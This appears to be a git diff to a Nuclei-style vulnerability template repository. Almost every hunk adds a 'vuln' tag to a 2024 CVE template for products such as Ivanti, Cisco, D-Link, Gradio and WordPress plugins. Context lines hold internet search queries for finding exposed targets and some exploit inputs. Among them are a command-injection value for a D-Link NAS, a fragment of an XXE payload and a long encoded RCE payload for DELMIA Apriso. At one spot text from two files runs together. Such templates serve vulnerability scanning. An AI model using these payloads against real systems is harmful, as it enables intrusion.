b/http/cves/2024/CVE-2024-13726.yaml index 7469778bce9..c5ead27f479 100644 --- a/http/cves/2024/CVE-2024-13726.yaml +++ b/http/cves/2024/CVE-2024-13726.yaml @@ -19,7 +19,7 @@ info: product: tc-ecommerce framework: wordpress fofa-query: body="wp-content/plugins/tc-ecommerce/" - tags: wpscan,cve,cve2024,wp,wordpress,wp-plugin,sqli,tc-ecommerce,timebased-sqli + tags: wpscan,cve,cve2024,wp,wordpress,wp-plugin,sqli,tc-ecommerce,timebased-sqli,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-1380.yaml b/http/cves/2024/CVE-2024-1380.yaml index 42d1b932e7d..6363da23e67 100644 --- a/http/cves/2024/CVE-2024-1380.yaml +++ b/http/cves/2024/CVE-2024-1380.yaml @@ -24,7 +24,7 @@ info: fofa-query: "/wp-content/plugins/relevanssi/" product: relevanssi vendor: relevanssi - tags: cve,cve2024,wp,wordpress,wp-plugin,relevanssi,exposure + tags: cve,cve2024,wp,wordpress,wp-plugin,relevanssi,exposure,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-13853.yaml b/http/cves/2024/CVE-2024-13853.yaml index 887cbad7e0d..6a9208c8ecc 100644 --- a/http/cves/2024/CVE-2024-13853.yaml +++ b/http/cves/2024/CVE-2024-13853.yaml @@ -22,7 +22,7 @@ info: product: seo-automatic-seo-tools shodan-query: http.html:"seo-automatic-seo-tools" fofa-query: body="wp-content/plugins/seo-automatic-seo-tools/" - tags: cve,cve2024,wp,wordpress,wp-plugin,xss,seo-automatic-seo-tools + tags: cve,cve2024,wp,wordpress,wp-plugin,xss,seo-automatic-seo-tools,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-13888.yaml b/http/cves/2024/CVE-2024-13888.yaml index 2a39822aced..a08dc2ee78f 100644 --- a/http/cves/2024/CVE-2024-13888.yaml +++ b/http/cves/2024/CVE-2024-13888.yaml @@ -24,7 +24,7 @@ info: framework: wordpress fofa-query: body="/wp-content/plugins/wpappninja" publicwww-query: "/wp-content/plugins/wpappninja" - tags: cve,cve2024,redirect,wp,wordpress,wp-plugin,wpappninja + tags: cve,cve2024,redirect,wp,wordpress,wp-plugin,wpappninja,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-13979.yaml b/http/cves/2024/CVE-2024-13979.yaml index 2235490d984..8e7fef6149a 100644 --- a/http/cves/2024/CVE-2024-13979.yaml +++ b/http/cves/2024/CVE-2024-13979.yaml @@ -25,7 +25,7 @@ info: verified: false max-request: 1 fofa-query: "圣乔ERP系统" - tags: cve,cve2024,erp,sqli,vkev + tags: cve,cve2024,erp,sqli,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-1483.yaml b/http/cves/2024/CVE-2024-1483.yaml index 6164b7796c5..d1e41627e08 100644 --- a/http/cves/2024/CVE-2024-1483.yaml +++ b/http/cves/2024/CVE-2024-1483.yaml @@ -31,7 +31,7 @@ info: - title="mlflow" - app="mlflow" google-query: intitle:"mlflow" - tags: cve,cve2024,mlflow,lfi,intrusive,lfprojects + tags: cve,cve2024,mlflow,lfi,intrusive,lfprojects,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-1512.yaml b/http/cves/2024/CVE-2024-1512.yaml index e52825e2df1..76c6b164aca 100644 --- a/http/cves/2024/CVE-2024-1512.yaml +++ b/http/cves/2024/CVE-2024-1512.yaml @@ -25,7 +25,7 @@ info: product: masterstudy_lms framework: wordpress fofa-query: body="wp-content/plugins/masterstudy-lms-learning-management-system/" - tags: time-based-sqli,cve,cve2024,sqli,wp-plugin,wordpress + tags: time-based-sqli,cve,cve2024,sqli,wp-plugin,wordpress,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-1561.yaml b/http/cves/2024/CVE-2024-1561.yaml index f30cc2aa662..74f89ede7d8 100644 --- a/http/cves/2024/CVE-2024-1561.yaml +++ b/http/cves/2024/CVE-2024-1561.yaml @@ -31,7 +31,7 @@ info: shodan-query: html:"__gradio_mode__" product: gradio vendor: gradio_project - tags: cve,cve2024,intrusive,unauth,gradio,lfi,lfr,vkev + tags: cve,cve2024,intrusive,unauth,gradio,lfi,lfr,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-1698.yaml b/http/cves/2024/CVE-2024-1698.yaml index feb31321274..861b648ff26 100644 --- a/http/cves/2024/CVE-2024-1698.yaml +++ b/http/cves/2024/CVE-2024-1698.yaml @@ -25,7 +25,7 @@ info: fofa-query: body="/wp-content/plugins/notificationx" product: notificationx vendor: wpdeveloper - tags: time-based-sqli,cve,cve2024,wpscan,wordpress,wp-plugin,notificationx,sqli,vkev + tags: time-based-sqli,cve,cve2024,wpscan,wordpress,wp-plugin,notificationx,sqli,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-1709.yaml b/http/cves/2024/CVE-2024-1709.yaml index 54b5ae64db9..38684f537d0 100644 --- a/http/cves/2024/CVE-2024-1709.yaml +++ b/http/cves/2024/CVE-2024-1709.yaml @@ -34,7 +34,7 @@ info: hunter-query: - app.name="ConnectWise ScreenConnect software" - app.name="connectwise screenconnect software" - tags: cve,cve2024,screenconnect,connectwise,auth-bypass,kev,vkev + tags: cve,cve2024,screenconnect,connectwise,auth-bypass,kev,vkev,vuln variables: string: "{{rand_text_alpha(10)}}" diff --git a/http/cves/2024/CVE-2024-1728.yaml b/http/cves/2024/CVE-2024-1728.yaml index e83203d8ba4..822a8d01534 100644 --- a/http/cves/2024/CVE-2024-1728.yaml +++ b/http/cves/2024/CVE-2024-1728.yaml @@ -27,7 +27,7 @@ info: vendor: gradio product: gradio shodan-query: html:"__gradio_mode__" - tags: cve,cve2024,lfi,gradio,intrusive + tags: cve,cve2024,lfi,gradio,intrusive,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-20419.yaml b/http/cves/2024/CVE-2024-20419.yaml index 889a24394cd..88bdd5f946e 100644 --- a/http/cves/2024/CVE-2024-20419.yaml +++ b/http/cves/2024/CVE-2024-20419.yaml @@ -25,7 +25,7 @@ info: fofa-query: title="On-Prem License Workspace" verified: true max-request: 4 - tags: cve,cve2024,cisco,on-prem,ssm,intrusive,account-takeover,vkev + tags: cve,cve2024,cisco,on-prem,ssm,intrusive,account-takeover,vkev,vuln flow: http(1) && http(2) && http(3) && http(4) diff --git a/http/cves/2024/CVE-2024-20439.yaml b/http/cves/2024/CVE-2024-20439.yaml index 01b81f7554a..f7793d30bfa 100644 --- a/http/cves/2024/CVE-2024-20439.yaml +++ b/http/cves/2024/CVE-2024-20439.yaml @@ -19,7 +19,7 @@ info: metadata: verified: true max-request: 1 - tags: cve,cve2024,cisco,smart,licensing,auth-bypass,kev,vkev + tags: cve,cve2024,cisco,smart,licensing,auth-bypass,kev,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-20440.yaml b/http/cves/2024/CVE-2024-20440.yaml index c8a0223aaa9..b104c1e54ac 100644 --- a/http/cves/2024/CVE-2024-20440.yaml +++ b/http/cves/2024/CVE-2024-20440.yaml @@ -18,7 +18,7 @@ info: metadata: verified: true max-request: 1 - tags: cve,cve2024,cisco,smart,licensing,info-leak,vkev + tags: cve,cve2024,cisco,smart,licensing,info-leak,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-2053.yaml b/http/cves/2024/CVE-2024-2053.yaml index 02eab14031b..8c8facb908f 100644 --- a/http/cves/2024/CVE-2024-2053.yaml +++ b/http/cves/2024/CVE-2024-2053.yaml @@ -25,7 +25,7 @@ info: fofa-query: body="artica" verified: true max-request: 1 - tags: cve,cve2024,lfi,artica-proxy,articatech + tags: cve,cve2024,lfi,artica-proxy,articatech,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-20767.yaml b/http/cves/2024/CVE-2024-20767.yaml index d2152db6a08..bd7f767228d 100644 --- a/http/cves/2024/CVE-2024-20767.yaml +++ b/http/cves/2024/CVE-2024-20767.yaml @@ -26,7 +26,7 @@ info: shodan-query: http.component:"Adobe ColdFusion" product: coldfusion vendor: adobe - tags: cve,cve2024,adobe,coldfusion,lfr,kev,vkev + tags: cve,cve2024,adobe,coldfusion,lfr,kev,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-21136.yaml b/http/cves/2024/CVE-2024-21136.yaml index 2202330d36c..76ef13e4e25 100644 --- a/http/cves/2024/CVE-2024-21136.yaml +++ b/http/cves/2024/CVE-2024-21136.yaml @@ -25,7 +25,7 @@ info: vendor: oracle product: retail_xstore_office shodan-query: html:"xstoremgwt" - tags: cve,cve2024,oracle,xstore,lfi,vkev + tags: cve,cve2024,oracle,xstore,lfi,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-21485.yaml b/http/cves/2024/CVE-2024-21485.yaml index 337146c32ca..c795f8bd63a 100644 --- a/http/cves/2024/CVE-2024-21485.yaml +++ b/http/cves/2024/CVE-2024-21485.yaml @@ -22,7 +22,7 @@ info: cpe: cpe:2.3:a:plotly:dash:*:*:*:*:*:*:*:* metadata: max-request: 2 - tags: cve,cve2024,dash,xss + tags: cve,cve2024,dash,xss,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-21633.yaml b/http/cves/2024/CVE-2024-21633.yaml index d2772b7c3c3..94b2ac4f68c 100644 --- a/http/cves/2024/CVE-2024-21633.yaml +++ b/http/cves/2024/CVE-2024-21633.yaml @@ -29,7 +29,7 @@ info: vendor: mobsf_project product: mobile-security-framework fofa-query: title="MobSF" - tags: cve,cve2024,mobsf,intrusive,rce,lfi + tags: cve,cve2024,mobsf,intrusive,rce,lfi,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-21641.yaml b/http/cves/2024/CVE-2024-21641.yaml index 70f7acef507..7ce388f9c63 100644 --- a/http/cves/2024/CVE-2024-21641.yaml +++ b/http/cves/2024/CVE-2024-21641.yaml @@ -27,7 +27,7 @@ info: product: flarum fofa-query: header="flarum_session=" zoomeye-query: app="Flarum" - tags: cve,cve2024,flarum,redirect + tags: cve,cve2024,flarum,redirect,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-21644.yaml b/http/cves/2024/CVE-2024-21644.yaml index fae2d8d1ecd..9e4a80f4c5b 100644 --- a/http/cves/2024/CVE-2024-21644.yaml +++ b/http/cves/2024/CVE-2024-21644.yaml @@ -40,7 +40,7 @@ info: - intitle:"login - pyload" - intitle:"pyload" zoomeye-query: app="pyLoad" - tags: cve,cve2024,python,pip,pyload,access-control + tags: cve,cve2024,python,pip,pyload,access-control,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-21645.yaml b/http/cves/2024/CVE-2024-21645.yaml index a593e22dc3b..99747e0639c 100644 --- a/http/cves/2024/CVE-2024-21645.yaml +++ b/http/cves/2024/CVE-2024-21645.yaml @@ -38,7 +38,7 @@ info: - intitle:"login - pyload" - intitle:"pyload" zoomeye-query: app="pyLoad" - tags: cve,cve2024,pyload,authenticated,injection + tags: cve,cve2024,pyload,authenticated,injection,vuln variables: str: "{{rand_base(6)}}" diff --git a/http/cves/2024/CVE-2024-21650.yaml b/http/cves/2024/CVE-2024-21650.yaml index 864fd3223a6..169727e1e37 100644 --- a/http/cves/2024/CVE-2024-21650.yaml +++ b/http/cves/2024/CVE-2024-21650.yaml @@ -28,7 +28,7 @@ info: product: xwiki shodan-query: html:"data-xwiki-reference" fofa-query: body="data-xwiki-reference" - tags: cve,cve2024,xwiki,rce,vkev + tags: cve,cve2024,xwiki,rce,vkev,vuln variables: user: "{{rand_base(6)}}" diff --git a/http/cves/2024/CVE-2024-21683.yaml b/http/cves/2024/CVE-2024-21683.yaml index 825ed905584..eaf7d315602 100644 --- a/http/cves/2024/CVE-2024-21683.yaml +++ b/http/cves/2024/CVE-2024-21683.yaml @@ -26,7 +26,7 @@ info: fofa-query: "app=\"ATLASSIAN-Confluence\"" product: confluence_data_center vendor: atlassian - tags: cve,cve2024,atlassian,confluence,rce,authenticated,intrusive,vkev + tags: cve,cve2024,atlassian,confluence,rce,authenticated,intrusive,vkev,vuln variables: username: "{{username}}" password: "{{password}}" diff --git a/http/cves/2024/CVE-2024-21887.yaml b/http/cves/2024/CVE-2024-21887.yaml index 7981d985d2a..ed84db5e618 100644 --- a/http/cves/2024/CVE-2024-21887.yaml +++ b/http/cves/2024/CVE-2024-21887.yaml @@ -31,7 +31,7 @@ info: - body="welcome.cgi?p=logo" - title="ivanti connect secure" google-query: intitle:"ivanti connect secure" - tags: packetstorm,cve,cve2024,kev,rce,ivanti,vkev + tags: packetstorm,cve,cve2024,kev,rce,ivanti,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-21893.yaml b/http/cves/2024/CVE-2024-21893.yaml index 91b240ac5f1..dda683244ac 100644 --- a/http/cves/2024/CVE-2024-21893.yaml +++ b/http/cves/2024/CVE-2024-21893.yaml @@ -32,7 +32,7 @@ info: - body="welcome.cgi?p=logo" - title="ivanti connect secure" google-query: intitle:"ivanti connect secure" - tags: cve,cve2024,kev,ssrf,ivanti,vkev + tags: cve,cve2024,kev,ssrf,ivanti,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-22024.yaml b/http/cves/2024/CVE-2024-22024.yaml index 19e58a28938..1f3c739f611 100644 --- a/http/cves/2024/CVE-2024-22024.yaml +++ b/http/cves/2024/CVE-2024-22024.yaml @@ -28,7 +28,7 @@ info: - body="welcome.cgi?p=logo" - title="ivanti connect secure" google-query: intitle:"ivanti connect secure" - tags: cve,cve2024,xxe,ivanti,vkev + tags: cve,cve2024,xxe,ivanti,vkev,vuln variables: payload: 'Stash" - tags: cve,cve2024,stash,sqli + tags: cve,cve2024,stash,sqli,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-32238.yaml b/http/cves/2024/CVE-2024-32238.yaml index 688e4e9f92b..452f69e742d 100644 --- a/http/cves/2024/CVE-2024-32238.yaml +++ b/http/cves/2024/CVE-2024-32238.yaml @@ -23,7 +23,7 @@ info: verified: true max-request: 2 fofa-query: body="icg_helpScript.js" - tags: cve,cve2024,h3c,router,info-leak,vkev + tags: cve,cve2024,h3c,router,info-leak,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-3234.yaml b/http/cves/2024/CVE-2024-3234.yaml index d3cfa7bc0b6..1438ed0efe7 100644 --- a/http/cves/2024/CVE-2024-3234.yaml +++ b/http/cves/2024/CVE-2024-3234.yaml @@ -19,7 +19,7 @@ info: max-request: 1 vendor: gaizhenbiao product: chuanhuchatgpt - tags: cve,cve2024,chuanhuchatgpt,lfi + tags: cve,cve2024,chuanhuchatgpt,lfi,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-32399.yaml b/http/cves/2024/CVE-2024-32399.yaml index 0c55284c31e..5725a429d49 100644 --- a/http/cves/2024/CVE-2024-32399.yaml +++ b/http/cves/2024/CVE-2024-32399.yaml @@ -22,7 +22,7 @@ info: shodan-query: html:"RaidenMAILD" product: raidenmaild vendor: raidenmaild - tags: cve,cve2024,lfi,raiden,mail,server + tags: cve,cve2024,lfi,raiden,mail,server,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-32640.yaml b/http/cves/2024/CVE-2024-32640.yaml index 7d5ecb8240f..78a83fae823 100644 --- a/http/cves/2024/CVE-2024-32640.yaml +++ b/http/cves/2024/CVE-2024-32640.yaml @@ -21,7 +21,7 @@ info: shodan-query: - 'Generator: Masa CMS' - "generator: masa cms" - tags: cve,cve2024,sqli,cms,masa,masacms,vkev + tags: cve,cve2024,sqli,cms,masa,masacms,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-32651.yaml b/http/cves/2024/CVE-2024-32651.yaml index d392799bbc6..3cb65fef6c4 100644 --- a/http/cves/2024/CVE-2024-32651.yaml +++ b/http/cves/2024/CVE-2024-32651.yaml @@ -22,7 +22,7 @@ info: verified: true max-request: 1 shodan-query: html:"Change Detection" - tags: cve,cve2024,changedetection,ssti,rce,passive + tags: cve,cve2024,changedetection,ssti,rce,passive,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-32709.yaml b/http/cves/2024/CVE-2024-32709.yaml index d5d4ccbb334..ce3c1ff1c3b 100644 --- a/http/cves/2024/CVE-2024-32709.yaml +++ b/http/cves/2024/CVE-2024-32709.yaml @@ -25,7 +25,7 @@ info: publicwww-query: "/wp-content/plugins/wp-recall/" product: wp-recall vendor: plechevandrey - tags: cve,cve2024,wp-plugin,wp-recall,wordpress,wp,sqli + tags: cve,cve2024,wp-plugin,wp-recall,wordpress,wp,sqli,vuln variables: num: "999999999" diff --git a/http/cves/2024/CVE-2024-3272.yaml b/http/cves/2024/CVE-2024-3272.yaml index 211824814e6..4fc910f3efc 100644 --- a/http/cves/2024/CVE-2024-3272.yaml +++ b/http/cves/2024/CVE-2024-3272.yaml @@ -23,7 +23,7 @@ info: vendor: dlink product: "dns-320l_firmware" fofa-query: app="D_Link-DNS-ShareCenter" - tags: cve,cve2024,dlink,nas,kev,vkev + tags: cve,cve2024,dlink,nas,kev,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-3273.yaml b/http/cves/2024/CVE-2024-3273.yaml index ad19425c2f6..d326cbd2bb0 100644 --- a/http/cves/2024/CVE-2024-3273.yaml +++ b/http/cves/2024/CVE-2024-3273.yaml @@ -25,7 +25,7 @@ info: product: "dns-320l_firmware" fofa-query: "app=\"D_Link-DNS-ShareCenter\"" max-request: 1 - tags: cve,cve2024,dlink,nas,kev,vkev + tags: cve,cve2024,dlink,nas,kev,vkev,vuln variables: cmd: "id" diff --git a/http/cves/2024/CVE-2024-32735.yaml b/http/cves/2024/CVE-2024-32735.yaml index 1861a327499..dcf039bf5d2 100644 --- a/http/cves/2024/CVE-2024-32735.yaml +++ b/http/cves/2024/CVE-2024-32735.yaml @@ -23,7 +23,7 @@ info: verified: true max-request: 1 shodan-query: html:"PDNU" - tags: cve,cve2024,cyberpower,auth-bupass,vkev + tags: cve,cve2024,cyberpower,auth-bupass,vkev,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-32736.yaml b/http/cves/2024/CVE-2024-32736.yaml index c9fb4ca189c..13b894affc7 100644 --- a/http/cves/2024/CVE-2024-32736.yaml +++ b/http/cves/2024/CVE-2024-32736.yaml @@ -22,7 +22,7 @@ info: verified: true max-request: 1 shodan-query: html:"PDNU" - tags: cve,cve2024,cyberpower,sqli,vkev + tags: cve,cve2024,cyberpower,sqli,vkev,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-32737.yaml b/http/cves/2024/CVE-2024-32737.yaml index df54b152e29..2a708a48525 100644 --- a/http/cves/2024/CVE-2024-32737.yaml +++ b/http/cves/2024/CVE-2024-32737.yaml @@ -23,7 +23,7 @@ info: verified: true max-request: 1 shodan-query: html:"PDNU" - tags: cve,cve2024,cyberpower,sqli,vkev + tags: cve,cve2024,cyberpower,sqli,vkev,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-32738.yaml b/http/cves/2024/CVE-2024-32738.yaml index 050764fdfcb..aa0d10decb3 100644 --- a/http/cves/2024/CVE-2024-32738.yaml +++ b/http/cves/2024/CVE-2024-32738.yaml @@ -23,7 +23,7 @@ info: verified: true max-request: 1 shodan-query: html:"PDNU" - tags: cve,cve2024,cyberpower,sqli,vkev + tags: cve,cve2024,cyberpower,sqli,vkev,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-32739.yaml b/http/cves/2024/CVE-2024-32739.yaml index 8d4ce2c9201..5e7222135ac 100644 --- a/http/cves/2024/CVE-2024-32739.yaml +++ b/http/cves/2024/CVE-2024-32739.yaml @@ -22,7 +22,7 @@ info: verified: true max-request: 1 shodan-query: html:"PDNU" - tags: cve,cve2024,cyberpower,sqli,vkev + tags: cve,cve2024,cyberpower,sqli,vkev,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-3274.yaml b/http/cves/2024/CVE-2024-3274.yaml index 16fea98e7c9..f24eccaa5ee 100644 --- a/http/cves/2024/CVE-2024-3274.yaml +++ b/http/cves/2024/CVE-2024-3274.yaml @@ -24,7 +24,7 @@ info: fofa-query: body="Text:In order to access the ShareCenter" product: dns-320l vendor: dlink - tags: cve,cve2024,dlink,exposure + tags: cve,cve2024,dlink,exposure,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-32870.yaml b/http/cves/2024/CVE-2024-32870.yaml index 9a6b93a6a3c..f510916c913 100644 --- a/http/cves/2024/CVE-2024-32870.yaml +++ b/http/cves/2024/CVE-2024-32870.yaml @@ -24,7 +24,7 @@ info: product: itop shodan-query: html:"iTop login" fofa-query: body="iTop login" - tags: cve,cve2024,itop,disclosure,unauth,exposure,vkev + tags: cve,cve2024,itop,disclosure,unauth,exposure,vkev,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-32964.yaml b/http/cves/2024/CVE-2024-32964.yaml index 833ad99d07f..8664e270bfc 100644 --- a/http/cves/2024/CVE-2024-32964.yaml +++ b/http/cves/2024/CVE-2024-32964.yaml @@ -24,7 +24,7 @@ info: vendor: lobehub product: lobe-chat fofa-query: icon_hash="1975020705" - tags: cve,cve2024,lobechat,ssrf + tags: cve,cve2024,lobechat,ssrf,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-3300.yaml b/http/cves/2024/CVE-2024-3300.yaml index b517f5ae7b2..cc375d538e2 100644 --- a/http/cves/2024/CVE-2024-3300.yaml +++ b/http/cves/2024/CVE-2024-3300.yaml @@ -20,7 +20,7 @@ info: verified: true max-request: 1 shodan-query: html:"/apriso/" - tags: cve,cve2024,delmia,apriso,rce + tags: cve,cve2024,delmia,apriso,rce,vuln variables: payload: "Xen6Kc3IzHt%2BdoV%2BPj%2F35uNLZ3O2hyUIhvrXOfqC2i3eUo9SbanyGLfuvLrjYrU2TxOlCK0CK87B1VxEE4VRSbVvlIbN5o0zg9BB4GAlDwIlE4hbLH9QLrU9cmOei3jb9h2z8IIukYZG5haCIc%2Fyr4NOUl8OcuhXFm8BHWqSHvE3bQpxbD1LLfSf5FkEDzaznsGbrtDBs%2FHWFGeD69J%2BlNaHHvNJbHmMC%2FoRrTT3RFuldg50HWvqfKJSSgsEcIPrXgLxr2%2FzK56jlCIkJAFP%2BIPoCk6%2FsHLmMkrP561GbbdwT9r%2BBoQyQl6iUzhP4ZQxMlYZV6j6h1GQFEXn%2F%2BU%2B2r84%2F4i4xkfjLVgS26btxAuI6yGpNw37LRHMn9RkEOhv4VTTntggOdifqD5mXLrDCxefkWJhLkaq0ozfC2nVLD69cPSx0MBKJAwMUim5zoAVKob14AnCGf4bQh5m%2FhNUF3gzj9AyfCZXl730O7ChP4jSLBapYmdAvG1mEuYDZ7%2BpnO%2Fd2hl6gPZvip3hqFbaJh1cumKyRAVEmE3CGRy6FU1ackcZ9Lru3zYY%2BwaOb92S%2Fj2qaM875NphidyRQuAAOti8pWTf%2FsWfnOXlscsoh2EUZLDDJ7VJUWh%2Flj3rpwdWHdGHmxBYd5QR7%2Bu0QYi1HLem86SZGyLK%2Bkx%2BuxdKoPuzyfqlt9ILTWhJVkAINiwRCtTFRjj7MsNCWejwHWUyeHyQ2YYWaWkFO7lJIcenX2eKQRCS%2B68dW33qJF3u0xReBYcxXmB2AF1j8W2qDKNx0uBXNYNsnYk0aA8%2BZU0yfm6QuBUmFuLsZzPhKIiNf9y59NBk9aAmVyHKsZpNersuTm4aTMcICsSpsTvZ2y17V6pf9XX1vy9qNoatMIjBXDZj%2FvBnxWnnRVeRriNOwnvk4ONhvWL938HtALiDGT1hH15cF0Z5Ky%2Byx%2Bkm%2BoGJhBsDt%2Fj7Tc9QC11LczdzDtAVRRCd7v%2B%2FhM2tYWUO869VEmS8C%2BnYXy6Hyc7Rex2LzbrRmC1taJ2%2FuOORA2euVwH53MXk3QDyZJvQ6Wl%2FmBQsCFYq6Dh54jogc7UVmlTmxGUt%2FNARx%2FlyhksZCMl9dmpe7S6tVO47bU%2B7qeUSzD6OnMG%2BUYjk5%2BVaetZvqCNwgb4vcjnDYNtOlI3mUspq67S4uerq6MVmt3A5gjLxSpY%2FFu72YiGRv8VwPdkDKzsYsILedDW3NDcpgbC8mtO%2FSYBhXQICxaEGFJLZAxqqC%2FHMbQ35WbtwGnnPEyfzPqmMxLctqGJLHeZ1RxZyisLOklHBoxyOptSWPAQiFOoJ%2ByxG5kkMctTOs4D%2Bu1k%2FYkZxUaUgSIi%2FX8tZe1RXSC8o04cCOndsy3bBfIsyvrHkSO9yKgVNDfvaMFznnKo9l6xEHBIf175zLU%2BxOc1cx4szWnG%2Bobl2DV1XUzyYNpHeF1qY3%2Fyafm19ds2A4U3rmAj8GIWt8zil7mkZw3qtp12pOgtf7NrAAyQRmr8htdFM8uU92acd62lo6Gtxepq0eA4WLpkF7dgNbJ%2FQmN8kWt3jYuq%2F4u7BiCk8sdUo6TvjO9xxqf9Uv0oZnw4Q2%2BdL55F30Lm8y9LPrr7HJh6ZrZ4qowmnjm0gUWyLsYXhOUx%2BRWN9jewpDJopdpxsKzave96k7gbelJvLZK9pZfnLbLMPMcsBhOv7anIcfUu3w1IVsJrw1Nd46BigvTfd1XNDF%2Fc7FM8kwXi8ecqjrvJAufyXLmi2L5H3bULUpAXnAYD3IN6E04B084dRHZOOY%2Bey%2BWxTZZWloGDqhu%2FNmJhO0s1gFYOXay10qRykT%2FyZxLAZJQKjKJA7kM47NMXGI6IXl%2BGVz5v2g7YTnOEMRKhjH3j9dvLT03RsGAk2CWxlON0H8KNr%2BOKer7os%2B5R3IZnsG48YxadEofC3esPQ5Zxz5z7C80VS88MUAMwWmenNYTB%2Bo6N%2FirkYq40EhezqB97hewGfMVzhx2MihU7LhAIG1T7181TIAPJBGs6IIgryYDdQxQ%2FnSa5AViqyiEZvr%2FgAQFgmTIJuTkTasvqEwDuuXgus5QOwwcPZeWQJkCi5j8K6xllJd3C9ACYsbuPMafsVrO0uNEdknloF1UV14k9hNpeq2F%2FA%2BR0noVVCsUIzytm7nyGutUwUzwrWcQ4iyb1QgeusrK81hGds0K2aTrsl054EwxtZumEvDTTjlCdVLCbwlIa2BfjuuKkSay9leZjnIujgElrAfyXqdfdjdfOjRYMlcMhJYKl7ikzPVCNBK8hWYIko0%2FWs2nxfljuJRZV9%2BDtrl3IhR%2BHfF7HGySxBrRQoBGLMBZDJrSwk2doA38aaiCj0WTIvkUfUoV3RK7b85dEQyf9cnd5Slk572O%2FJLSuU2mhRruvAJ9q6pInSedwHk8BvgGyGqKJmx2vTaOvRDdi0TKjqwqa6RVgQ8fvAU5puOTop9tK1neFBLF440S8TEoq5SGCyX%2B49jq4A8uffN4Ve7EIMYlB%2BsqNNbO5Uj%2BIpSzl5qzXQ7q8M9otezz2RHMIBWBnEFX%2F%2FmPuymIHoBMFwzecuDvtqa2fkR3D8zKvyx%2F5c6tj2Z417XwTlm4Jj%2F07p93S7q%2BCTgvKYJeF0avtW7iRAliA1g%2FMe6de%2FJDsg%2B5O3ayxVxFh5ThdvE%2F2GOGqjjovI%2FHlV0Uhu1YGxaNBQtnt7PMi9P4y45%2Fc7kihxxisOebsAqVD1r%2FYRo2Vkyg03s4kF0M8CL39z4Eii8EEHjqjBPPpb55fWZyGPzsT01jVcf1f0v6glDuxgu2QnSn%2BUz9sFW61GafW2odYYJ27Uefb7ZipGDpUU2QXoafKwf16mg8QwxFSSao0vKkM4rg7qxBN3NZaHONYTmxgOi2uEPwp66v2swpCK0bpkv%2Bf3zKnmigd4eI2KnbmpDdSnGJnYlASNj2E7yq%2FvTE7tgAzeIE18ijMraKkm3yaGkjUtCL8JmD0OQDEfnUAlBGrQ0z1iJGhF4lU4H1RVlRJ%2BGSpAZoj26Ek%2Frfjo6Sj%2Fo92u5SlSB6BWFjS950MgSVRY24x9huo6qOiSlB0WigxPVpAO%2BxL%2FQRIfn0iyLNwKnrcMhyKectEXBg3S4O3vPCQ7woWFvu8Q1t6pPbhT1gxmOUyt0665PKbYBrK4Us1mU1qTVjZ1RDVGFQyRyVTnZjKz8SngKtgw0Tz6uheYnkeN4rHkOueXr%2FApXE1lgb7M3%2F8fZw6mk6DaomR1%2BdhfMCDmYZFX%2FSn6sRBBRjQG9OCeYNg4tpc5n22UW%2Ff0UJAbtdsFjHHc0bFPCJHQLShderEHxpOU9l5WnsPM1hK9%2BfckZqSjqvy%2FisR8vls6ZIa6aYzGwPtkiS6JxTnx3DHdUmBBRUqHfd7NBBCTpfBcQoD8AyqZ0YADRqGRVWZy1QUJTCCjVXAkV6ZWkLf4yuct8TuYbXNrysIYszHkoHo95hA9OECx8ybzrdT4TH7YoDfRr3EY%2F8aAYugsw0CWU79tsAwO5PWrLuFrsStuPao7tRIRxUTHehJ8BOZuKbNYShMEqeQskAUoESVT4N6veyxNAb3FpcuwVh4I5EVA52mqz7xR3LqtIWm5DC292DlhQtg7UXY1tMXFtrXmAMJuDPC5cQ915BSyiM6wdiwOde9zu7HKCaQjrxBPZxoS0G4zJjtKaA5%2F2v0ELEbByek%2FhgNlm3EnnwqIEUSfcUovYgb3gzXzLNnKuzZb7ITy%2FMrJncv0SGpajMu8GK0NJKaXCTAIhuPks42%2FkH0h2NunbXyFf7S001yeLn9ueCzdt%2FK88uj%2F2ow0JH%2FDKbkMwpYg8al%2B3PJQSu34Nb78kPfj5E0z%2BcV5eCZIMp47RfqkBtAbejjoxLfuA2bdoikr7RBUuIVRelvOTIgg8o478QQLnGSvlnMMraH8YXZZVgHg9GCC83W8ji9ef5AtiG3fIGfOl8nRhzIC6bd4xDxcBK0yXnFD6Er4V37TAuZbC9p6apru6W5fjALpifI9m4XifeBpVVmqJPL0109rARq%2BoqjD4WmKGpZMModSol3bFVkPoKrlCuIY22DQ4wGX7PtDHOfEkrjq8GDehepGeCFfwHq%2ByekfR0KLzKTUI